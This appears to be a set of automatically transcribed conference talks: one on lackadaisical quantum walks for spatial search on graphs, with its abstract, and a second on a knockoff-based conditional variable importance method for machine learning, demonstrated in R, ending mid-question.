So with this normal Grover coin, let's see how it acts on the amplitude. So let's say you're here and you're pointing left with amplitude A, you're pointing B with amplitude, sorry, you're pointing right with amplitude B, and you're pointing to yourself with amplitude C. So what we're going to do is we're going to let mu be the average of these amplitudes. So it's literally A plus B plus C divided by 3. So it's just the average of these amplitudes. What the Grover coin does is it transforms this state into the following. So where there was an amplitude A of pointing to the left before, it now becomes 2 times the average minus A. And then where there was B before, it becomes 2 times the average minus B. And where there is amplitude C becomes 2 times the average minus C. And so this transformation actually is an inversion about this average mu. And so if you learn Grover's algorithm from an introductory course in quantum computing, one of the operations is an inversion about the mean. This is exactly that. So this Grover coin implements an inversion about the mean. And so if you try to search algorithms, it ends up having that Grover characteristic. Any questions so far before we get to the lackadaisical version? OK, so for the lackadaisical version, we need to see what happens on a weighted graph. So now we have this self-loop with weight L. And the left and right are unweighted. So they're weight 1. So let's say the amplitudes again are A, B, and C. And let's see what happens. So instead of the average of the amplitudes, I'm going to define this quantity mu bar, which is A plus B. And for C, since it has weight L, it gets multiplied by the square root of L divided by the sum of the weight. So this is weight 1, weight 1, weight L. So this is 1 plus 1 plus L. So this is not the average of the amplitudes anymore. And what this generalized Grover coin does on a weighted graph is amplitude A becomes 2 times this not average minus A. B becomes 2 times this not average minus B. And C becomes something a little different. It's 2 times this average, not not average, times the square root of L minus C. OK, so what happens is A and B get inverted about this non-average, this whatever it is, mu bar. So unweighted edges are inverted about this quantity. And then C is inverted about this thing times the square root of L. So that acts a little differently. And you can generalize this to whatever weighted graphs you want. So this is actually just a quantum walk on a weighted graph now. Looking for a picture, OK? So let's see what happens. So the reason why the Grover coin is defined like that is because if you use that generalized Grover coin and you use the flip-flop shift, what you get is a walk that is exactly the same as Zegadie's quantum Markov chain. Because with a quantum Markov chain, you have different probabilities of moving one way or another. So it's essentially a weighted graph. So this is the quantum, this is the coin quantum walk equivalent of Zegadie's quantum walk. The flip-flop shift I haven't talked about yet, so just to quickly go over that as many of you know. If you're at this vertex and pointing right, so you're here, you're pointing right, what you do is you hop and then you turn around. So you end up here pointing backwards. So you, you, and then you flip. So it's a flip-flop shift because you flip your direction. So that's it. So using that previous coin on a weighted graph and this shift, you get something that's exactly the same as Zegadie's quantum walk or quantum Markov chain. All right. So with all that, let's see how it acts on the 1D line. So here's the classical result. Here's the normal coin quantum walk and the lackadaisical quantum walk is this. And so what you see is that, okay, yeah, there is some probability of staying very close to where you started. But there's also a significant probability of being far from when you started that's actually even further than a normal quantum walk. So in some sense, a lackadaisical quantum walk, even though it's lazy, can actually spread faster-ish because of this middle peak. And so you might start to wonder, well, are there any algorithmic improvements that you can make with this property? The standard deviation of this is still linear in time, but it's a bigger factor in front. And so we're going to look at some search problems with that. Pause the moment so people can finish writing. You're telling me you're a standard grads. All right, so let's go ahead and do that. Let's apply this to some algorithmic problems, to some search problems, and see if we can get any improvements. So let's start by talking about what this search problem is. It's called spatial search. So imagine you're looking for a cafe. So this is Riga Latvia, where I did my first postdoc, and that's the University of Latvia. And so imagine you're new to Latvia, and you're looking for a cafe, and you're starting in front of the university, and you're like, I don't know where a cafe is, but this is Europe. If I just wander around, I'm sure I'll find a cafe. So what you can do is you can do a random walk. So from here, you have three options. You can go up to the left, you can go up to the right, or you can go down to the right, and you just randomly pick one. So let's say you go up to the right. So up to the left, never mind, very random. And now here, again, you're like, well, which way should I go? There's no cafe. Here you can go up to the left, up to the right, or you could actually go back the way you came, maybe that way you don't like. So you randomly pick one, and you end up over there. Again, you have three choices. You go over there. You have more choices now, which way to go, and say you randomly pick that one, and then, oh, there's a cafe there. So the idea is you randomly walk. Go, is your cafe? No, randomly walk. Is your cafe? No, randomly walk. Is your cafe? No, randomly walk. Is your cafe? Yes, you found your item. So this is the spatial search problem. Quantumly, you can do a very similar thing, except with a quantum walk. So if you start there, now you can walk in superposition. So you flip your quantum coin, a three-sided coin, and then you walk in superposition, and now you can end up in all three of those locations. You do the same thing. At all those locations, you flip your coin and walk, and you end up in something like that. And now you see that there's actually some probability at that cafe that's in the corner. There's actually another cafe over here, but whatever. There's actually cafes everywhere. It's Europe. Okay. But this is the idea of spatial search. So let's get to the particulars of it and how fast these algorithms can be, starting with the complete graph. So this corresponds to Grover's algorithm. So here's an example of a complete graph with six vertices. In general, we'll have n vertices. And it's a lackadaisical quantum walk. We have a self-loop of L everywhere. And let's just say that's the marked vertex indicated by a double circle. But the idea is that you don't know that, you're trying to find it. So there's something to explore in a couple of papers. And the complete graph corresponds to Grover's problem. It's this unstructured or this unordered database that Grover's algorithm solves. Because the idea is there's no order here. If you read this vertex, you can jump to any other vertex. There's no constraints as to how you can move. All right. So there it is again. So let's talk specifically about this algorithm, since this is a quantum walk conference. You guys can see more of what's going on under the hood. So for the initial state, all of the amplitudes along these internal edges are the same. So the amplitude of here pointing to there is the same as the amplitude here pointing to there. And the same as the amplitude here pointing to there. And all of these internal edges, you start with the same amplitude everywhere. And then for the self-loops, it's that amplitude, except you multiply it by the score root of L. Because it has some nice properties and stuff. A couple of nice properties. One of them is that this is a uniform superposition over the vertices. So every vertex has the same total probability. Because all of these internal edges are the same. And then they all have the same, all of these self-loops have the same amplitude as well. So basically every vertex has the same total amount of amplitude, same total amount of probability. So this is a uniform superposition over all the vertices. If you were to measure this initial state, you'd get each vertex with probability 1-6 in this case. Another property of this is that this is a one eigenvector of the quantum walk of the coin in the shift. So if you applied only the quantum walk to this initial state, nothing happens. If you want to search, you need to do more than just apply the quantum walk. You need to query the oracle as well. You have to ask, am I at a cafe? So the search algorithm applies the following. You have an oracle query, and then you do the quantum walk, which is just the Grover coin and the flip-flop shift. So this constitutes one step, and you're going to repeatedly step through this. So the Grover coin we talked about, the flip-flop shift we talked about, now let's talk about what the oracle query is. Any questions? OK, so the oracle query here is really simple. All it does is it flips the amplitude at marked vertices. So just give you an example. Let's say we have an unmarked vertex here, and it has amplitude A of pointing up, B pointing to the right, C pointing down, and D pointing to the left. So if you apply the oracle to this, nothing happens because this is unmarked. So you skip the exact same thing when you query the oracle. If it's marked on the other hand, shown by this double circle, then each of these amplitudes, A, B, C, D, become flipped. So you get minus A, minus B, minus C, and minus D. So this is the phase flip oracle that you use in Grover's algorithm for whatever problem you're solving. So it's the same idea here. So that's it. So all you do is you apply this phase flip oracle, so the marked vertices get their amplitudes flipped, and then the Grover coin, and then the flip-flop shift, and you just keep doing that over and over. That's it for the search algorithm. So let's see how this searches the complete graph, let's say, with 1024 vertices. So let's start with no self-loops. So with no self-loops, or when L is zero, what happens is the success probability starts at 1 over 1024, which is pretty small. And as you keep applying this query coin shift over and over and over, the success probability builds up. So more and more probability builds up at your marked vertex until it reaches a peak of a half, and then it's going to go down and then keep going up and down like that. And so this time at which you reach your max success probability, this is order square root of n, which is Grover's order root n runtime. Since the success probability is a half, on average you'll have to run the algorithm twice before you find the marked vertex, but if you double your runtime, it's still order square root of n, so you're fine. So this is the quantum walk version of Grover's algorithm without lackadaisical, anything like that, just normal coin quantum walk version. If you make it a lackadaisical quantum walk, let's see what happens. So instead of L being zero, let's increase L a little bit to 0.1. And you see that the success probability that you reach, instead of reaching half, you reach a little bit higher value. If L is 0.2, you reach a higher value still. If L is 0.4, it's even higher. If L is 0.8, it's almost that one. Let's keep going, let's clear the graph, so we keep going. If L is one, you do reach a success probability of one. If L is greater still, two and a half, oh now it's actually worse. If it gets more lazy, it's worse again. If you get more lazy, it's still worse. And so what we see is that the best amount of laziness is actually, if you increase more, is actually when L equals one. So for this algorithm, there's some optimal amount of laziness, which could be a life lesson. And so we do get algorithmic improvements by using a lackadaisical quantum walk. And you can actually, so yeah, you can search more quickly with a lackadaisical quantum walk. So you can actually prove all this analytically. So that's in the paper. Basically, depending on what value L is, you can find what the runtime and the success probability is. You don't need to parse through all that. The idea though is that this is solved. And basically any question you want to ask, you can get from these results. So for example, the success probability originally was a half, and then it went up, and then it went back down. And at some point, it became less than a half again. So there's some range of L's where you'll do better than a half. You can use these formulas to figure that out. And what you can find is that when L is less than roughly 5.8, the success probability is better than a half. So you can ask whatever question you want like that. Any questions so far? All right, so let's jump to the two-dimensional grid or the torus. And again, say there's n vertices. And this is a torus, so the boundary conditions wrap around. So let's see what happens here. So again, we'll just look at some simulations. So the normal coin quantum walk, no self-loops, not lazy, looks like this. So here n is 256. So the success probability starts at 1 over 256, and it builds up a little bit, and then goes back down and so forth. So if we make it lazy, let's say L is 0.005. And now the success probability actually jumps up quite a bit. It's more lazy. It jumps up some more. Make it more lazy. And oh, it's bad again. So again, we see the same trend where there's some optimal amount of laziness so that your success probability is boosted as much as possible. And so with this one, if it's bigger still, it's still worse. So this optimal amount of laziness is green curve that's 0.015. This actually corresponds to when L is 4 over n. And so for example, if we let L be 4 over n, we can pick different values of n, different size grids. So when n is 256, which is the plot we just had, you get this. When n is 1024, you get this. If n is 4096, you get this. And you basically see that the success probability is constant and it's near 1, which is nice. And so in terms of runtimes, well, a normal quantum walk that's not lazy, it's the time to reach that first peak in success probability, scales as the square root of n log n, and the success probability, so the value of that peak, scales as 1 over log n. And so if you use amplitude amplification, the total runtime is root n times log n. So it's almost square root of n. You have a log factor. With the lazy or lackadaisical quantum walk, when L is 4 over n, what we get is that the runtime has the same scaling, but now your success probability is constant. So you don't have to use amplitude amplification to repeat the algorithm. And so then the total runtime is just root n log n with the log inside the square root as opposed to outside the square root. And so what we see is we actually do get an improvement in the runtime scaling, not just the constant factor. So with the lackadaisical quantum walk, you get an order log n, an order square root of log n speed up. This is all done numerically. I wasn't able to prove this. So this is an open question if you want to work on a proof. Any questions? Yeah, question? OK. All right. So in terms of the graphs that have been explored with the lackadaisical quantum walk, we have the complete graph that I talked about. We have a 2D grid or a torus, as it's talked about, with one marked vertex. Some people have explored different configurations of multiple marked vertices as well. People have also looked at the 1D cycle and this network that has some hierarchy to it. And with my student, again, we looked at the hypercube and some other things. And in all of these graphs, all the self-loops had the same weight. So you had the same amount of laziness everywhere. And the reason for that is because all of these graphs are vertex transitive, meaning every vertex has the same structure. And so there's no structural reason for one vertex to be more lazy than some other vertex. So you have all the weights be the same. That's very reasonable physically. So we were wondering, well, is there a case where you might naturally have different amounts of laziness at different vertices? And I think a very natural example of that is the complete bipartite graph. And this is what my student Mason, Rhodes, and I explored this year. So again, a bipartite graph looks like that. A complete bipartite graph means you have all the edges between them. OK, thank you. OK, good, I have more time. So I'll say there's n1 vertices on the left, n2 vertices on the right. So again, we have two part types sets, n1 and n2 vertices. And every vertex in one set is adjacent to all the vertices in the other because it's complete. And in general, this is not regular. So in general, you can have a different number of vertices in one set versus the other set. And because of that, structurally, these vertices on the left have a different structure from the vertices on the right. And so now it becomes natural to have one amount of laziness for these vertices and some other amount of laziness for these vertices. And so let's call these self-loops weight l1 and these self-loops weight l2. So we have now a lackadaisical quantum walk with different amounts of laziness. All right, so what we'll look at next is we'll look at this case that's not lazy first, and then we'll look at the lazy or lackadaisical case. All right, so let's start with the normal coin quantum walk, not lazy at all. So as a first step, the easiest case would be if you have all your marked vertices in one set. And then later, we'll have marked vertices in both sets. So let's say you have k marked vertices, and they're all in this first set that has size n1. And the initial state here is going to be the following. So all of these edges have the same initial amplitude. So one consequence of this is now this is not a uniform superposition over the vertices. And that's because these vertices have a lot more edges than these vertices here. So these vertices are going to start with a greater initial amplitude. So not all the vertices have the same initial probability now. These actually have a greater probability. If you're curious how the initial state evolves, if you are in a uniform superposition over all the vertices, you can check our paper. But this case that I'm going over here, this is cleaner. So that's what I'll talk about. So here's some simulations of that. So with different values. So say you have three marked vertices in the left set, which has 400 vertices total. And say the right set also has 400 vertices. So what happens is the success probability goes up, reaches a half at this time, and then it goes back down and it's periodic again. Let's say we change the number of vertices in the second set. So instead of 400, let's say it has 200. What you see is we get the exact same evolution. The success probability reaches a half at the same time. And again, if you change the number of vertices in the right set to even just one, you can see these little green dots and it follows the same curve. So what we see is that the number of vertices in the second set doesn't matter. All the marked vertices are in the first set, on the left set. And that does matter. So if we change the number of vertices in the first set, we reach a probability of a half at an earlier runtime, because there's a few vertices in the left set. If we change it even more, if all the vertices in the left set are marked, we're actually just always at a success probability of a half. And so, yeah, so that's what happens. We were able to prove this analytically so that the success probability reaches a half, as you saw in the previous graphs. And the time at which you reach that probability only has N1 and K in it. There's no N2. Again, the number of vertices in the second set doesn't matter. And so again, the only thing that matters in the runtime is the ratio of N1 and K. It's only the first set's properties. Any questions? All right, so now if we have marked vertices in both sets, so say K1 in the left set and K2 in the right set, let's see what happens. So here's some values. So if there's three marked vertices in the left, two marked vertices in the right, and that number in both sets. And one of the things that you'll notice here is that the ratio or the density of marked vertices in each set is the same. I guess you could phrase it like that. And what you find is that, well, let me plot this. So I'm going to plot this as the success probability in the left set separately and then the success probability in the right set so you can see what happens in each set. So the success probability in the left set evolves like this. Again, it reaches a half. The success probability in the right set that has two marked vertices and 400 total vertices evolves like that the same way. And so the total success probability would just be the sum of these two curves, which then of course reaches one. And so what we see here is that because the densities are the same, they end up peaking at the same time and so then you get a total success probability of one. The densities are different. So here I've changed the value. So now the densities are not the same. So I've swapped these two sizes. The first set is going to peak there. The second set on the right is going to peak there at a different time. And so now, of course, if you add them, you won't reach a success probability of one. You'll get something a little bit less. And so we're able to analytically prove this. The runtime in each set, so in the left set, you get a probability of a half. At this time, that only depends on the properties of the left set, the density. And the right set also reaches a success probability of a half. And the time only depends on its density of marked vertices. And so if these two line up, then they add up together, they get a success probability of one. So that's kind of neat. So again, the only thing that matters is what goes on in each set. Otherwise, they evolve independently of each other. Any questions before we get to the lackadaisical versions? All right. OK, so let's make this lackadaisical now. And we'll go back to the first case. That's easier, where you only have K marked vertices in one set. And now you have self-loops with weight L1 here, and self-loops with weight L2 here. So again, they can be different amounts of laziness. Or they could be the same. You can pick the same value on both sides. Doesn't matter. The point is you can now adjust this. All right, so let's see what happens. So just to remind you, with the normal coin quantum walk, it evolves like this. If you make it lackadaisical, let's change L1. So let's say L1 is 0.3. We see that we get a boost in the success probability, which is nice. If we change the L1 some more to 0.6, it gets better still. Make it more lazy, we get that. Make it more lazy, we get that, which reaches 1, which is nice. If you make it more lazy, it goes down. More lazy, it goes down, and down, and down, and so forth. So same story. There's some optimal amount of laziness. And in this case, it's when L1 is 1.2 with these values here. OK, so let's go ahead and, oh, it's more lazy. OK, so it's the best when L1 is 1.2. So let's fix L1 as being 1.2. And now let's see what happens as we vary L2. So this is what we just had before. Now if we change L2 to make that lazy as well, oh, nothing happened. Make L2 even bigger, nothing happens. Make it even bigger, oh, nothing happens. So with marked vertices in the left set, it seems like it doesn't matter how lazy the right set is. It only matters how lazy the left set is. And so we see that L2 doesn't matter here. And so here's another way of visualizing that. So what we did is we varied L1 and we varied L2. And we plotted in color as a heat map the maximum success probability. So you see that the success probability is 1, as long as L1 is 1.2. And then it doesn't matter what L2 is. It's the same thing. So from this, you can see that L2 doesn't matter. Only the left set, where the marked vertices are, matter. And we were able to analytically prove this. So you want L1 to be that, which is 1.2, with the numbers we just had. And then the success probability reaches 1, and the runtime doesn't have N2 in it. It only has what's going on in the left set. Any questions? All right. So now, marked vertices in both sets, k1 in the left, k2 in the right. So with these values, let's just pick different values of laziness. So with no laziness, this is what you would get. It looks a little crazy now, because it's marked vertices in both sets. So they might not add up nicely. If you make it lazy now with, say, L1 is 15, L2 is 5, you do get some improvement here. With these values, L1 is 15, and L2 is 100. It's pretty similar to that. If L1 is 80, and L2 is also 80, you get something that's not very good. And if you look at these, it's kind of hard to compare these. Because even this black curve, I mean, it reaches 1 over here. Like, should we use that peak, or should we use this peak? It's like, how do you compare these? And so a good quantity to look at is the total runtime with classical repetitions, which is basically the idea that if your success probability is, say, 1 half, you have to run the algorithm twice on average before you find your marked vertices. And so the total runtime then is the single runtime divided by your success probability of a single run. And so we can plot that as a heat map here. So this is now the total success probability, which is the total runtime. Sorry, the total runtime, which is the single runtime divided by the success probability. And what you see is that it's not so nice anymore, depending on how lazy each side is. And so the color here is, I picked the middle to correspond to the normal coin quantum walk. So anything that's more yellow, which is less time, which is faster, is better. So we see that if the laziness values are within here, that it's better, but if it's over here, it's worse, and so forth. And in particular, the values that we just saw here, these correspond to these points. So this is the normal coin quantum walk. The red and the green ones where we got an improvement are in this yellow band. And in this blue curve over here, where it's worse is in this dark blue area, which we expect to be worse. And so this is this simulation of what happens. We weren't able to prove this. It's a mess. So that's an open question. If you want to take us, if you want to try that. Here's another example. So here I've actually swapped the number of mark vertices in each set. So before, it's 5 and 2. Now it's 2 and 5. So if we look at that, oh. So again, the middle is the normal quantum walk. And so there's kind of nothing that's better. So at least with these particular values, it seems like there's no improvement with the self-loops, which I thought was kind of surprising. Because if you can pick the weights of the self-loops on each side, it seems like there's got to be some values you can pick to make things better. Because all the previous papers showed that you could do better. And here we're actually showing that for these values, you can't do any better. And here's another set of values where there's the same number of marked vertices in each set, but the sets are different sizes. It looks like this. So you get a little bit of improvement here. But for most values of laziness, you don't get any improvement. And so there's some limited improvement here. And again, this is open for proof, if you want to try proving that. So it's an open question. So just to summarize what we've talked about, we saw that lackadaisical quantum walks spread faster in one dimension-ish, because there is still that central peak. But the two peaks on the side spread faster than a normal coin quantum walk. We see that they improved search for a bunch of problems that were vertex transitive, like the complete graph, the grid, and so forth. And when we apply it to the complete bipartite graph, we do still get an improvement for sure if the marked vertices are only in one set. But if the marked vertices are in both sets, then you might get improvement, or you might not. And exploring that would be some great future work if anyone's interested. And so if you want to see the papers, you can just go to my website, it has all my papers, or you can ask me or email me or something like that, and be happy to take your questions. Thanks for the question. Do you have questions for me? All right, thanks for the nice talk. It's an interesting result that you found. You mentioned in one of your slides that you were just looking at something similar, like a physical quantum walks on the hypercube. And in like around 10 years ago, we did something similar. We extended the SKW search with the self-loops. Are you aware of those? I'm not aware of that work. And if you could email that to me, I'd be really interested. Yeah, OK. Yeah. We should continue in this. Yeah. Although one thing that sounds different is, did we use the same oracle? Because if you use the SKW1, that one uses a different oracle. So we'd have to see how that compares. Yeah, definitely we can talk. Just in your initial model, with one dimension. So the analog of, say, the Hadabard matrix is you're talking about the Grover matrix tree by tree. Well, I guess the analog of the Hadabard matrix would be a Fourier matrix. But I was looking at the Grover coin because I'm specifically interested in search problems. OK. So those parameters you have L and A and B feed into this Fourier matrix? Is for what, sorry? Those parameters, A, B, and the amplitudes, they're part of the Fourier matrix that you're choosing. No, I was just showing how the Grover coin would act if the amplitudes were A, B, and C. OK. Yeah. Just to show that what it does is that it flips around the average if it's unweighted, and if it's weighted, and it does that funny thing. Please. Regarding the 2D letters, you said that you don't use amplitude amplification. So how can you, and you did that numerically, so how can you know numerically that you don't have a square root of log? Yeah. And there is a name multiplying by the log. So the log is hidden by the N. How can you distinguish square root of N log N, log N outside the square root N? I understand. Square root of N log N. Yeah. So if we're fitting a curve, a square root of log factor is very hard to see. And so in that paper, I give plots and try to justify that the fit is correct. I didn't show any of that here. So if you want, we can look over it more closely offline. Yeah. I have another question regarding the truncated simplex lattice. You have an algorithm that search on that lattice, and it seems that it is not square root of N. It is larger than square root of N. Yeah. That was searched with a continuous time. Exactly. Random, a quantum walk. So it's not square root of N? No. Is the first order truncated lattice, is it? So it wasn't square root of N if you have an unweighted graph with a continuous time quantum walk? Is it possible to find a square root of N algorithm in this case? So I was able to get it down to close to square root of N by weighing the edges that connected the clicks. So you have these clicks, right? And then if you weigh the edges that join those clicks, those long distance edges, you are able to improve it. And as the weight increases, the runtime tends towards the square root of N. So I wasn't able to exactly reach square root of N, but it tends towards it. Obtained the story. Yeah. So it like so. OK. Yeah. OK. As the weight increases, then it asymptotically approaches square root of N. And I'll give a quick comment. Historical. So you mentioned child's paper about laser quantum walk, but there is one before, I think it's 2005. OK. By Inui, Kono, and Segawa. I think it's the first one on laser quantum walk. OK. Is that the same as the three state quantum walk? Three state. Yeah. So I didn't talk about the history of the order with which I did this. So I actually didn't look at the 1D line first. I actually looked at search on the complete graph first, and then wrote the paper, submitted it, and then I'm very thankful that the refuge responded saying, oh, this seems very similar to three state quantum walks, which I had never heard of at that time. And so yeah. So basically, I agree that the 1D walk is very similar, but just the way it was developed is kind of from a different perspective that then ends up having a lot of similarities. Thanks for the talk. Could you talk about how robust your search algorithm is to noise? What kind of noise? Any sort of positional noise, coin noise, anything in that regard? Are you talking about deco coherence? Or are you talking about if you just use a different? I would say more decoherence. OK. Any sort of spatial or temporal decoherence? There's been some work on it that I have not done. So I know that maybe experts in this room can comment on that, but that's not something that I know very well. Another question? How familiar are you to this oracle theoretical bounds for oracle searches? And is this, I don't know, does that apply to your scenario? Yeah, it does. So it's still true that the fastest you can search is order square root of n, because of the optimality of Grover's that would still apply, because that has to do with which oracle you use. So we're using the same type of oracle that's in Grover's problem. So you can still only search in the square root of n. Depending on the graph you search on, you may not be able to reach that. So for example, if you search on the one-dimensional line, you actually can't search faster than order n, than a linear n, which means you can't do any better than just randomly guessing for the marketware text. Thanks. So thanks, speaker. Thank you. Thank you.
|
The coined quantum walk is a discretization of the Dirac equation of relativistic quantum mechanics, and it is a useful model for developing quantum algorithms. For example, many quantum spatial search algorithms are based on coined quantum walks. In this talk, we explore a lazy version of the coined quantum walk, called a lackadaisical quantum walk, which uses a weighted self-loop at each vertex so that the walker has some amplitude of staying put. We show that lackadaisical quantum walks can solve the spatial search problem more quickly than a regular, coined quantum walk for a variety of graphs, suggesting that it is a useful tool for improving quantum algorithms.
|
10.5446/54137 (DOI)
|
I'll give you an example in R. So if you think about machine learning, you probably think like image classification or natural language processing or speech recognition coming to your mind. So for example, you might see here the CT image and your machine learning detects a tumor right here in this CT image. But all of these applications are about prediction. But in epidemiology, that's also the definition of the WHO is that we're interested in the determinants of diseases. So that is interpretation. So we don't want to predict something, some disease states, we also want to do that. But that's, I would say, more rarely. But usually we're interested in understanding diseases. And that's what we want to do here. So to develop model agnostic interpretable machine learning. So model agnostic means you can choose your machine learning method and your interpretation methods method works anyway. So the interpretation method doesn't dictate the machine learning method you want to use. And more specifically, we want to talk about conditional variable importance. So consider this very typical example, you have an exposure x, an outcome y and a confounder z. And now the confounder has an effect on x and y, but there's no effect from your exposure to the outcome. And if you apply your standard linear model to that, you will see effects like that. So if you scale that, you would see that x has a zero effect on y and z has a large effect on y. And that I would say is correct if you look at this deck right here. But if you apply a typical machine learning method, so for example, you apply random forest and calculate the permutation variable importance, you'll get also an effect of x. And that's because x is correlated to y. So the method cannot handle cannot adjust for the confounding by the confounder z. The reason is that the linear model is a conditional method, but the random forest or in general, most machine learning interpretability methods are marginal measures. So we want to fill maybe this gap here on the right. So we want to do machine learning, but do a conditional testing. And if you, from a statistical perspective, the marginal test tests whether your variable of interest, call it xj, is independent of y. So is there a dependency between the two? And the conditional hypothesis we're interested in is xj independent of y, given all other x's. So all other variables you have in the data set that might be confounders. And as I just said, we want to do conditional testing with machine learning. Just you might have heard of the permutation importance. That's the one we just used in the random forest. I briefly explained the algorithm. So what you do is you fit your model to your data, you determine some kind of loss function. So how well does the model predict unseen data? And now you replace a variable of interest by a permuted version of that variable, and determine the loss afterwards. So how much does the prediction get worse if you permute your variable of interest? So if it gets worse, the variable was important. If it doesn't get worse, the variable wasn't important. And that's why your permutation importance is a difference between the two losses. So your estimated variable importance of the variable j is this difference. And that's the marginal measure as I've shown in the box plot on the second slide, because the permutation results in xj star. So the permuted of xj being independent of y, but also independent of our others, because it just permuted, it makes it independent of all other variables in your data. And what we do in our method is only a slight modification. Instead of the permutation, here the difference is highlighted in red. We replace the variable by its knockoff version. So I'll explain a little bit more on that. And then the remains the steps four and five remain the same. So we determine the loss afterwards and look at the difference. Now we call this the conditional predictive impact instead of the permutation variable importance. And the difference is that these knockoffs result in your now knockoff variable is independent of y, but preserves all correlations between to the other axis. So for example, the correlations to a confounder remains there. And that's why it's a conditional measure. For the knockoffs, I won't go into the details, but the idea is to have a knockoff matrix x tilde, which is where you have equal correlations between your original variables and the variables in the knockoff matrix. So the correlation between the two variables in the original data set is the same as the two knockoff variables. And also the same if you take one from the original and one from the knockoff matrix. But your x tilde is independent of y given x. So that was originally proposed for as negative controls for the forces covering rate. But that original method is this Kandes 2018 paper requires an existing variable points. And that's the part where the model agnostic comes into play, because this is not model agnostic, because you need that existing method. And they often use it from the Lassoux, but it also works for example with the random forest, you could also plug in other methods, but you need a model specific model specific variable importance measure for our method, you don't need that. There have many, many knockoff samplers have been proposed very recently. So they are multivariate Gaussian ones or second order multivariate Gaussian ones in Markov model, you can also use deep learning approaches for that, and so on. We now focus on the second order multivariate Gaussian in Markov model, but it actually doesn't matter so much, which does matter, but it works just with all of them. We'll see that a bit later. We can also do statistical inference. So you can show that our CPI estimate is as in totally normally distributed. So we can just use the instant wise loss for statistical inference. We change the algorithm just a little bit that we use as a look at instance wise loss and not the, so for example, instead of the mean squared error, we just look at the squared error. And then we can use that for statistical testing, and just do a T test or also a fishes accept randomization test for small samples actually also works for large samples. So that's a big plus that you can get statistical testing, you get standard error estimates, you get confidence intervals, but you don't get with most of the machine learning interpretability methods. So the result is here on the right, we see now on our toy example that we do see no effect of the exposure on the con on the outcome, but we do see an effect of the confounder on the outcome. And that's actually what you see in the graph. So we have a conditional measure based on machine learning. I also want to show some simulation results. If you're interested in the details of the simulation study, I have the slides prepared, just want to save some time. So these are the box plots of calculated CPI values with different machine learning methods, could argue that maybe the first one is not a machine learning method, and once on linear and on nonlinear data. And you see that and the effect size here on the horizontal axis, and you see that the CPI values increase with the effect size, that's what you would expect for it to work, but also that it's at zero for no effect, for example, the only case where it's not working is for nonlinear data on with the linear model, which makes sense. As a linear model has no power to detect anything on nonlinear data. That's why you might use machine learning in the end. You can also look at the type one and type two error. So here the zero effect size, that's the type one error. And you see that for all four methods, this is at 0.05 as expected, and the power increases over time. So by that you can see that it works again with all of these different machine learning methods. And I want to show you a brief example on how to use that. And I'll show you some R code for that. So to use, there's the CPI package. I forgot to put the GitHub link here, I just noted. So you would have to install it from GitHub at the moment because it's not on Cran yet. And you load the CPI package, the MLR package, and we also use ggplot for plotting. And we want to use the Boston Housing Data. The data is already included in the MLR package, but there is a two level factor and we have to convert that to binary. So that's the first step we have to do as a preparation. And then we can just apply CPI on the task we just defined. And we say here we want to use Ranger, so a random forest. We could add here, for example, we want to have 500 trees and try a value of whatever value you want to choose. And we said that we estimate loss and we need some kind of resampling for that. And here we use a 10-fold cross-validation. So it will then do internally a 10-fold cross-validation and estimate the loss by that cross-validation. And then you almost immediately get the result. And that's here, for example, for the variable RM, I think that's number of rooms. You get quite a high CPI estimate, very small p-value. And you also get the lower part of the confidence interval, which is also far away from zero. And you also get some others. For example, here this one, you don't know what the variable represents. The CPI value is close to zero, p-value is quite big, and also the lower end of the confidence interval is below zero. So that's then the result you get. We can do the same maybe again for a support vector machine. So now instead of Ranger, we use here the SVM with the radial kernel. And instead of just to show you that you can choose other methods here, instead of the 10-fold cross-validation, we use a five times repeated sub-sampling. So this is all. If you have used the MLR package before, you will know these re-sampling and make learner things that's specific to MLR. And we save the results from that call and plot it with ggplot. Then the result looks like this. So we see that again, this number of rooms get a high estimate. And now we plotted a bar plot and added some standard errors. And you see, for example, that you have some very small values. And by the standard error, you can also get some idea of the variability in that. Because it often happens that these things are a little bit unstable and bar plots of random forest variable importance might look completely different if you run it again. And it's, I think, quite important to get variability estimates for that. Okay, to conclude, so our conditional predictive impact is the model-agnostic method. So you can plug in any machine learning method you want to. It can be as simple as the linear model. But it can also be a fancy deep learning algorithm. You don't have to refit it. You just have to predict again. So even if you have a complicated deep learning method, the CPI will be quite fast because prediction is fast in your network. As we've seen it's conditional. So you can adjust for confounders and handling correlations. And I think that's very, very important if you really want to interpret, especially in epidemiology, any effects of any, I don't know, let it be an effect of a gene on a disease or let it be lifestyle factors, you always have to adjust for confounders. And that's actually not possible if you use the standard interpretability methods. You can do statistical testing without mutations or bootstrapping. And so far we have applied that to low-dimensional tabular data. So that's kind of what we have seen with the Boston Housing data. We've also, we also did that on other data sets. In the paper, we also have an example that's already quite high-dimensional on gene expression data. And recently that's not in the paper and also not published yet, is the application to genome-wide data. But this Gaussian knockoff sampler won't work for genome-wide data. So there we have several hundred thousand variables. So, but there's a hidden mark of knockoff sampler, which we can use there. And that's also, I think a nice feature that you, if you want to go for a new application where the other knockoff samplers won't work, you can plug in any new or different knockoff sampler. You want to just have to fit to the data at hand. And for the future, so a very important thing we have to, we have to find a solution for is to handle categorical data. So this genetic data is kind of categorical, but this is a very specific application. But in general, the knockoffs have been mostly proposed for continuous data, not for categorical one. And one solution could be dummy coding, but that also has some problems. And the next step in that direction is then mixed data. So if you have categorical and continuous data in the same data set, as in reality, you usually have. So that's, I think, for the application, a very, very important point to add. And we can also look at local importance. So that means, so I said that you do the statistical testing over the sample wise loss. So you could quite easily look at local importance. So you get the loss for every, for every person and usually in an AP data set. And then you could look at subgroups of persons and only calculate the effect for a subgroup. And a technical step we have to do is to also add support for MLR3. So you maybe have heard, if you have used MLR, that there's a new version and the old one is not really developed any further. So it would be good to also add support for the new MLR package. Okay. Thank you for listening. And now I'm open for questions. Yes. Thank you, Marvin. And so, yes, that was really straight, straight talk and on time. So it gives us a lot of time to ask you questions. So I'm opening the floor. Please, if you have a question, you can either write it on the chat or just turn on the microphone and ask the question directly. Well, I have a sort of question, I think. Please. I use our a fair amount for modeling. And one of the things we sometimes have to do is, if one is, if I am producing something for a continent, let's say, I have to subdivide the areas into zones and then do separate random forest models for each. And I have trouble combining them, combining, I mean, getting any, some sort of idea apart from the standard sensitivity or whatever and specificity. I have trouble combining the results of all these different models into one sort of overview of the sort that you're suggesting. Is your framework amenable to that? Can you or not? So you could fit a model on the whole data and then in the just in the interpretation part. Yeah. I mean, essentially, we would, it's a matter of combining the results from several different models. If you have a model for a continent, let's say, I would do maybe 10 models for different zones. Those zones may not be a country, they may be, let's say, landings, forest or cultivation. So they interlock, which makes it quite difficult to play 